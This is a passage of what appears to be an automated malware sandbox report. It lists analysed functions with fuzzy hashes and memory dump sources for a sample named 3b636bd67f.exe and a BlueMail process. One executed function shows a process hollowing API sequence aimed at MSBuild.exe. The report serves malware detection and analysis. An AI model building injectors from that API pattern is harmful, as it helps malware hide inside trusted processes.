Function 05E88B2E Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2328710655.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5e80000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bbcd8248a66f52e7b8b9c613671d49df6caac64778dcf899519327868382a28
Instruction ID: 8943987155cc4d5f7439edab498cc9db9cfb889f26f2b22797a65e074f945e7c
Opcode Fuzzy Hash: 4bbcd8248a66f52e7b8b9c613671d49df6caac64778dcf899519327868382a28
Instruction Fuzzy Hash: F6D09270A046189FDB24EF24CD547DA77B2FB09301F4026999449A3190EB301E85CF42

Function 0604D9D0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
Instruction ID: a5ced1602b898661de329531365079a034e3d75a808f59c5ffcbefa728424f66
Opcode Fuzzy Hash: 9145439845d19ed285ef8ed2e2731e53e84310996d3e08af64ba1494253e8755
Instruction Fuzzy Hash: 58C0927A140208EFC700DF69E848C85BBB8EF1977171180A1FA088B332C732EC60DA94

Function 0604B500 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c73f037d658e8ff5e476daf6b74ecac3ee1cff9d0b7e8e8889c34e81a1b0c4e9
Instruction ID: e3d97a045e3bc364f3579fe0d164de4e43d184d8f1f6c16c50ed7054821be679
Opcode Fuzzy Hash: c73f037d658e8ff5e476daf6b74ecac3ee1cff9d0b7e8e8889c34e81a1b0c4e9
Instruction Fuzzy Hash: 83B092C68497800FCB9322704C619C46EB019530507CA02D3C0E0C62E2D20944044222

Function 0604D9CE Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2329100840.0000000006040000.00000040.00000800.00020000.00000000.sdmp, Offset: 06040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6040000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e44b89b1bb9ba8bf36eab9a356b9bdb081fcb7109f79dfe12eb2b9103156715
Instruction ID: b02605d312c39c1f3e338fa41856ab7ba53ad420c30f12a7b26307cb4220dc06
Opcode Fuzzy Hash: 2e44b89b1bb9ba8bf36eab9a356b9bdb081fcb7109f79dfe12eb2b9103156715
Instruction Fuzzy Hash: 44C0927A140004DFC700CF64E648C867BB5EF183223168096F90C9B731D332E964DA00

Non-executed Functions

Function 060EE931 Relevance: 1.3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

Strings

U, xrefs: 060EE934

Memory Dump Source

Source File: 0000000E.00000002.2329668242.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60e0000_BlueMail.jbxd

Similarity

API ID:
String ID: U
API String ID: 0-3372436214
Opcode ID: ef9f9a3160370cb6b79df059ddb2ddbcac2a2c7714fd709d8a03050453167d8c
Instruction ID: c89287aa49299f32a1df5259f99d7b8afa20146aa00a2cfdaad217289a7e517b
Opcode Fuzzy Hash: ef9f9a3160370cb6b79df059ddb2ddbcac2a2c7714fd709d8a03050453167d8c
Instruction Fuzzy Hash: AD21FEB5C042189FDB14CFA9D880AEEFBF0FB49310F14902AE808B7201C736A945CFA4

Function 0606C8F0 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2329223681.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6060000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcf1298ce1ee77b234a2f0fb96543395a92089c78e613c341261b3d29f7887a0
Instruction ID: 79ee59380009725a9c8b36eaccfc74faafb15171b031526725e77416f71e8a10
Opcode Fuzzy Hash: fcf1298ce1ee77b234a2f0fb96543395a92089c78e613c341261b3d29f7887a0
Instruction Fuzzy Hash: 21916874E45208CFEB94CFAAD544BADBBF2FB49304F109069E459A7290CB389D85CF94

Function 0606C8E1 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2329223681.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6060000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 320488116a7edb87573bc4d45a5f9ccd12572cca6bf39c7b9c373816c2b30411
Instruction ID: 1163677e89f5c85907e99fa3f53db50cd00444d2800a72e7c668c71557d6d12d
Opcode Fuzzy Hash: 320488116a7edb87573bc4d45a5f9ccd12572cca6bf39c7b9c373816c2b30411
Instruction Fuzzy Hash: 6E915774E45208CFEB94CFAAD544BADBBF2FB49304F109069E459A7290CB389D95CF90

Function 06066A30 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2329223681.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6060000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0a9487bf4bfeec888d5d654aec51d7a39685511b2079b80db1416a2f2a5b601
Instruction ID: e615e35f3cea35b9c3adf277516fe00e88e4f530e3c5cf25bcd35a7c3919da18
Opcode Fuzzy Hash: f0a9487bf4bfeec888d5d654aec51d7a39685511b2079b80db1416a2f2a5b601
Instruction Fuzzy Hash: 4F518870D55208CFEB40CFAAD6447EDBFF6EB49304F10A02AE409A7240CB7A9985CF81

Function 06066A40 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2329223681.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6060000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c03a0afadc4972df1dcc1700e672c6cf4ee97d912a4911c79fa86aedbc22d7c
Instruction ID: 1db3d796d6f1970421c681f1fecc05609c0991414a2ef239d044735339f8694c
Opcode Fuzzy Hash: 3c03a0afadc4972df1dcc1700e672c6cf4ee97d912a4911c79fa86aedbc22d7c
Instruction Fuzzy Hash: 11516870DA5208CFEB94CFAAD1447EDBFF6EB49305F10A029E409A7240DB7A5991CF81

Function 032E1140 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2270604509.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_32e0000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe4d9f42298e45e274835099152c97972ca4bf57649fabe58b2df51441943220
Instruction ID: 65765b302496699376883cbedc128e53356e104dea41994d02189e72e065b41b
Opcode Fuzzy Hash: fe4d9f42298e45e274835099152c97972ca4bf57649fabe58b2df51441943220
Instruction Fuzzy Hash: 7641D1B4D10348DFDB14CFA9E885B9DFBF1AB09300F649029E418AB360D7749885CF85

Function 0606CAC9 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2329223681.0000000006060000.00000040.00000800.00020000.00000000.sdmp, Offset: 06060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6060000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ba42901368570e3f21b2f027c40ae15744022d0176c5d63a87eef8378a9d0f2
Instruction ID: fcb7c53f253b4366803840e62143d93c1d88bd07ae1ab8759bbc8a2ac7b895d3
Opcode Fuzzy Hash: 6ba42901368570e3f21b2f027c40ae15744022d0176c5d63a87eef8378a9d0f2
Instruction Fuzzy Hash: 82413774A41208CFEB54DFA9E9447ADBBF2FF49301F1090A5E449AB284CB385D94CF44

Function 060EE938 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2329668242.00000000060E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_60e0000_BlueMail.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fde4d98ea33dbe37a45f37f77749fa979491fb2647995ed8746228ede939603
Instruction ID: e459e9c85523597e8d541789d151d5308fcb0c5cc742ffe908213f4f40d149ac
Opcode Fuzzy Hash: 3fde4d98ea33dbe37a45f37f77749fa979491fb2647995ed8746228ede939603
Instruction Fuzzy Hash: 8221DCB5D042189FDB14CFAAD980AEEFBF4FB49310F10902AE804B7200CB35A941CFA4

Function 05A6978C Relevance: 5.1, Strings: 4, Instructions: 82COMMON

Download Yara Rule

Strings

Teq, xrefs: 05A6978C
", xrefs: 05A693FB
TJq, xrefs: 05A697AD
, xrefs: 05A697FF

Memory Dump Source

Source File: 0000000E.00000002.2325920314.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5a60000_BlueMail.jbxd

Similarity

API ID:
String ID: $"$TJq$Teq
API String ID: 0-436693337
Opcode ID: fa342e9dc195ecb689b9b7b01e2d8ff94c3138f4380495d23fa392124b32e1f0
Instruction ID: c8a58c08deaa296e456dc529316d9a176b489226de1aeeb9564dceff2d5457b8
Opcode Fuzzy Hash: fa342e9dc195ecb689b9b7b01e2d8ff94c3138f4380495d23fa392124b32e1f0
Instruction Fuzzy Hash: 3941D574D01228DFDBA0DF64E898B9EB7F1FF49304F10859AD81EA7240DB705A898F51

Function 05E807EB Relevance: 5.0, Strings: 4, Instructions: 41COMMON

Download Yara Rule

Strings

g, xrefs: 05E8080F
}, xrefs: 05E806B5
W, xrefs: 05E8083B
t, xrefs: 05E806E1

Memory Dump Source

Source File: 0000000E.00000002.2328710655.0000000005E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_5e80000_BlueMail.jbxd

Similarity

API ID:
String ID: W$g$t$}
API String ID: 0-1875243256
Opcode ID: 3d4f319018929bcffa80d7f84bd7535c399488d7b9763897e259de654becd994
Instruction ID: 4659cf23963a6a93d51d6189cdde6b45d7ef37cfda2aa8beca7f7278114b6f67
Opcode Fuzzy Hash: 3d4f319018929bcffa80d7f84bd7535c399488d7b9763897e259de654becd994
Instruction Fuzzy Hash: 0E11B0B4D1522CCFEB24EF64D989BECBAB1BB09314F0051A99A4DA3240C7741EC4CF80

Analysis Process: 3b636bd67f.exePID: 1008, Parent PID: 8028COMMON

Execution Graph

Execution Coverage:	5.8%
Dynamic/Decrypted Code Coverage:	0.6%
Signature Coverage:	1.4%
Total number of Nodes:	1451
Total number of Limit Nodes:	17

Executed Functions

Function 00B2E1A9 Relevance: 44.0, APIs: 11, Strings: 14, Instructions: 295
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00B2E11B,00B2E10B), ref: 00B2E33F
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00B2E352
Wow64GetThreadContext.KERNEL32(00000088,00000000), ref: 00B2E370
ReadProcessMemory.KERNELBASE(0000019C,?,00B2E15F,00000004,00000000), ref: 00B2E394
VirtualAllocEx.KERNELBASE(0000019C,?,?,00003000,00000040), ref: 00B2E3BF
TerminateProcess.KERNELBASE(0000019C,00000000), ref: 00B2E3DE
WriteProcessMemory.KERNELBASE(0000019C,00000000,?,?,00000000,?), ref: 00B2E417
WriteProcessMemory.KERNELBASE(0000019C,00400000,?,?,00000000,?,00000028), ref: 00B2E462
WriteProcessMemory.KERNELBASE(0000019C,?,?,00000004,00000000), ref: 00B2E4A0
Wow64SetThreadContext.KERNEL32(00000088,00AF0000), ref: 00B2E4DC
ResumeThread.KERNELBASE(00000088), ref: 00B2E4EB

Strings

ReadProcessMemory, xrefs: 00B2E294
aryA, xrefs: 00B2E1ED
ress, xrefs: 00B2E231
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, xrefs: 00B2E33E
SetThreadContext, xrefs: 00B2E2CD
WriteProcessMemory, xrefs: 00B2E2BA
GetP, xrefs: 00B2E229
CreateProcessW, xrefs: 00B2E25B
Load, xrefs: 00B2E1E5
VirtualAllocEx, xrefs: 00B2E2A7
VirtualAlloc, xrefs: 00B2E26E
TerminateProcess, xrefs: 00B2E3CE
ResumeThread, xrefs: 00B2E2E3
GetThreadContext, xrefs: 00B2E281

Memory Dump Source

Source File: 0000000F.00000002.2160310862.0000000000B2E000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00B10000, based on PE: true

Associated: 0000000F.00000002.2160201347.0000000000B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160226784.0000000000B11000.00000020.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160251180.0000000000B26000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160380345.0000000000B2F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160425518.0000000000B31000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160520683.0000000000B33000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_3b636bd67f.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2440066154-3857624555
Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
Instruction ID: e66a2ef35f58b9224a5fe0ce53b5a8e7e82b95dbc3400082121cc622a0bb69d8
Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
Instruction Fuzzy Hash: 1EB1F57260024AAFDB60CF69CC80BDA73A5FF88714F158164EA1CAB341D770FA51CB94

Function 00B117D0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 293
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B11000: _strlen.LIBCMT ref: 00B1108D

CreateFileA.KERNELBASE ref: 00B1184C
GetFileSize.KERNEL32(00000000,00000000), ref: 00B1185C
ReadFile.KERNELBASE(00000000,?,00000000,?,00000000), ref: 00B11885
CloseHandle.KERNELBASE(00000000), ref: 00B11895
_strlen.LIBCMT ref: 00B118F7
CloseHandle.KERNEL32(00000000), ref: 00B11B20
CloseHandle.KERNEL32(00000000), ref: 00B11B35

Strings

(, xrefs: 00B118D0

Memory Dump Source

Source File: 0000000F.00000002.2160226784.0000000000B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B10000, based on PE: true

Associated: 0000000F.00000002.2160201347.0000000000B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160251180.0000000000B26000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160310862.0000000000B2E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160380345.0000000000B2F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160425518.0000000000B31000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160520683.0000000000B33000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_3b636bd67f.jbxd

Similarity

API ID: CloseFileHandle$_strlen$CreateReadSize
String ID: (
API String ID: 2150716653-3887548279
Opcode ID: bd74e0c664c64fc7c696ab7804be0cdea1c266e90517dc38327fd867a09c710b
Instruction ID: 8e6ca3838b14f8492983bf77aeb554fb6a3ab38d9804c2b9322b9da9b65c476b
Opcode Fuzzy Hash: bd74e0c664c64fc7c696ab7804be0cdea1c266e90517dc38327fd867a09c710b
Instruction Fuzzy Hash: CEA10572D002148BCB14CFB8DC85AEEBBF6FF4A350F545669E911BB351E73099818B94

Function 00B11D30 Relevance: 18.2, APIs: 12, Instructions: 176
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00B11D63
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00B11D76

Part of subcall function 00B1234A: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00B12E92
Part of subcall function 00B1234A: ___raise_securityfailure.LIBCMT ref: 00B12F7A

GetCurrentThreadId.KERNEL32 ref: 00B11DFA

Part of subcall function 00B12E15: WaitForSingleObjectEx.KERNEL32(00B117D0,000000FF,00000000,?,?,?,00B11E17,?,00B117D0,00000000), ref: 00B12E21
Part of subcall function 00B12E15: GetExitCodeThread.KERNEL32(00B117D0,00000000,?,?,00B11E17,?,00B117D0,00000000), ref: 00B12E3A
Part of subcall function 00B12E15: CloseHandle.KERNEL32(00B117D0,?,?,00B11E17,?,00B117D0,00000000), ref: 00B12E4C

Part of subcall function 00B16F9F: CreateThread.KERNELBASE(00000000,00000000,Function_000070B7,00000000,00000000,00000000), ref: 00B16FE8
Part of subcall function 00B16F9F: GetLastError.KERNEL32(?,?,?,?,00B11DD3,00000000,00000000), ref: 00B16FF4
Part of subcall function 00B16F9F: __dosmaperr.LIBCMT ref: 00B16FFB

GetCurrentThreadId.KERNEL32 ref: 00B11E95
std::_Throw_Cpp_error.LIBCPMT ref: 00B11EED
std::_Throw_Cpp_error.LIBCPMT ref: 00B11EFF
std::_Throw_Cpp_error.LIBCPMT ref: 00B11F0E
std::_Throw_Cpp_error.LIBCPMT ref: 00B11F1D
std::_Throw_Cpp_error.LIBCPMT ref: 00B11F2C
std::_Throw_Cpp_error.LIBCPMT ref: 00B11F3E
std::_Throw_Cpp_error.LIBCPMT ref: 00B11F50
std::_Throw_Cpp_error.LIBCPMT ref: 00B11F62

Memory Dump Source

Source File: 0000000F.00000002.2160226784.0000000000B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B10000, based on PE: true

Associated: 0000000F.00000002.2160201347.0000000000B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160251180.0000000000B26000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160310862.0000000000B2E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160380345.0000000000B2F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160425518.0000000000B31000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160520683.0000000000B33000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_3b636bd67f.jbxd

Similarity

API ID: Cpp_errorThrow_std::_$Thread$CurrentHandleModule$CloseCodeCreateErrorExitFeatureFileLastNameObjectPresentProcessorSingleWait___raise_securityfailure__dosmaperr
String ID:
API String ID: 610485761-0
Opcode ID: d4a3ba2c091d6245bbbd5cf36c4f3e56854d6815073aecc38dea2d06e934990d
Instruction ID: f9a4bbfd4a627d484fbf93a2bf292ac3c362253a26b9916d5613ea430af0504d
Opcode Fuzzy Hash: d4a3ba2c091d6245bbbd5cf36c4f3e56854d6815073aecc38dea2d06e934990d
Instruction Fuzzy Hash: 6951A3B2D412099BEB10EFA4DC06BDFB7F0EB05710F440698EA14772C1E7B56954CAA5

Function 00B19BBE Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,2026DCDA,?,00B19CCD,?,?,00000000), ref: 00B19C7F

Strings

api-ms-, xrefs: 00B19C15
ext-ms-, xrefs: 00B19C29

Memory Dump Source

Source File: 0000000F.00000002.2160226784.0000000000B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B10000, based on PE: true

Associated: 0000000F.00000002.2160201347.0000000000B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160251180.0000000000B26000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160310862.0000000000B2E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160380345.0000000000B2F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160425518.0000000000B31000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160520683.0000000000B33000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_3b636bd67f.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: a0e75f17f60d17a426fea9f9d54e92290e6291dda0fbd1d8ae00b5890af04a91
Instruction ID: 124838dc0256d3f1c5b8c11350947bdbcc104a8f7f9747df722f81ea29976968
Opcode Fuzzy Hash: a0e75f17f60d17a426fea9f9d54e92290e6291dda0fbd1d8ae00b5890af04a91
Instruction Fuzzy Hash: AC210D31E40255A7D7329B24EC51AEE3FE8EB52760F6406B0F95AA72D0DB30ED41C6D0

Function 00B113F0 Relevance: 4.6, APIs: 3, Instructions: 149
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoResumeClassObjects.OLE32 ref: 00B1150E
KiUserExceptionDispatcher.NTDLL(00000000,00000000,00000000), ref: 00B11521
GetLastError.KERNEL32 ref: 00B11583

Memory Dump Source

Source File: 0000000F.00000002.2160226784.0000000000B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B10000, based on PE: true

Associated: 0000000F.00000002.2160201347.0000000000B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160251180.0000000000B26000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160310862.0000000000B2E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160380345.0000000000B2F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160425518.0000000000B31000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160520683.0000000000B33000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_3b636bd67f.jbxd

Similarity

API ID: ClassDispatcherErrorExceptionLastObjectsResumeUser
String ID:
API String ID: 3099690820-0
Opcode ID: e97df1ad2d8eaa30c3cc9b6339589cb2d4f71586d2caf04c57e9648db0d9703b
Instruction ID: c4a7437f4ee32602d2949e221f0243c43fec4c84e232e4337bb6d9d2e3d7f59a
Opcode Fuzzy Hash: e97df1ad2d8eaa30c3cc9b6339589cb2d4f71586d2caf04c57e9648db0d9703b
Instruction Fuzzy Hash: 3C516C708052A88BDF118FA8D8447EEBFF0FF1A314F1445AAD845B3281D2795A45CFA5

Function 00B11710 Relevance: 4.6, APIs: 3, Instructions: 60
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00B11000: _strlen.LIBCMT ref: 00B1108D

FreeConsole.KERNELBASE ref: 00B11741

Part of subcall function 00B113F0: CoResumeClassObjects.OLE32 ref: 00B1150E
Part of subcall function 00B113F0: KiUserExceptionDispatcher.NTDLL(00000000,00000000,00000000), ref: 00B11521

VirtualProtect.KERNELBASE(00B2E01C,00000549,00000040,?), ref: 00B11790
ExitProcess.KERNEL32 ref: 00B117C6

Memory Dump Source

Source File: 0000000F.00000002.2160226784.0000000000B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B10000, based on PE: true

Associated: 0000000F.00000002.2160201347.0000000000B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160251180.0000000000B26000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160310862.0000000000B2E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160380345.0000000000B2F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160425518.0000000000B31000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160520683.0000000000B33000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_3b636bd67f.jbxd

Similarity

API ID: ClassConsoleDispatcherExceptionExitFreeObjectsProcessProtectResumeUserVirtual_strlen
String ID:
API String ID: 3360678313-0
Opcode ID: 0e1cbfd78f0ac5fcc5b6a198e6064d5a187f441535c6f9bc03634092932cb5e1
Instruction ID: 0d5ece2a1efd2e8ce83d29c6c8a2d6ca06b80ad35ad32e91f0666dbcd9b24a6b
Opcode Fuzzy Hash: 0e1cbfd78f0ac5fcc5b6a198e6064d5a187f441535c6f9bc03634092932cb5e1
Instruction Fuzzy Hash: CB110A71E401146BDB00AB69EC07FFF77E4EB44701F4044B4F61CAB2C2E9B1A95186D5

Function 00B16F9F Relevance: 4.6, APIs: 3, Instructions: 51
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE(00000000,00000000,Function_000070B7,00000000,00000000,00000000), ref: 00B16FE8
GetLastError.KERNEL32(?,?,?,?,00B11DD3,00000000,00000000), ref: 00B16FF4
__dosmaperr.LIBCMT ref: 00B16FFB

Memory Dump Source

Source File: 0000000F.00000002.2160226784.0000000000B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B10000, based on PE: true

Associated: 0000000F.00000002.2160201347.0000000000B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160251180.0000000000B26000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160310862.0000000000B2E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160380345.0000000000B2F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160425518.0000000000B31000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160520683.0000000000B33000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_3b636bd67f.jbxd

Similarity

API ID: CreateErrorLastThread__dosmaperr
String ID:
API String ID: 2744730728-0
Opcode ID: bea5af61ccf3e81af37de05cdacc89af50ef1d64549f5f5c3c993fa00c8b5de3
Instruction ID: 158d8b7d66eaf9de4f3aeaf2d26f9369ede67d53574b22efcff86626282f2512
Opcode Fuzzy Hash: bea5af61ccf3e81af37de05cdacc89af50ef1d64549f5f5c3c993fa00c8b5de3
Instruction Fuzzy Hash: 19012572554209ABDF16AFA0DC1AAEE7BF5EF08360F504098F801A7190DF71CA91EB90

Function 00B120C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 46
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00B120C5

Part of subcall function 00B12CA2: std::invalid_argument::invalid_argument.LIBCONCRT ref: 00B12CAE
Part of subcall function 00B12CA2: std::exception::exception.LIBCMT ref: 00B12CCB

Part of subcall function 00B12D17: GetCurrentThreadId.KERNEL32 ref: 00B12D42

Strings

string too long, xrefs: 00B120C0

Memory Dump Source

Source File: 0000000F.00000002.2160226784.0000000000B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00B10000, based on PE: true

Associated: 0000000F.00000002.2160201347.0000000000B10000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160251180.0000000000B26000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160310862.0000000000B2E000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160380345.0000000000B2F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160425518.0000000000B31000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 0000000F.00000002.2160520683.0000000000B33000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_b10000_3b636bd67f.jbxd

Similarity

API ID: CurrentThreadXinvalid_argumentstd::_std::exception::exceptionstd::invalid_argument::invalid_argument
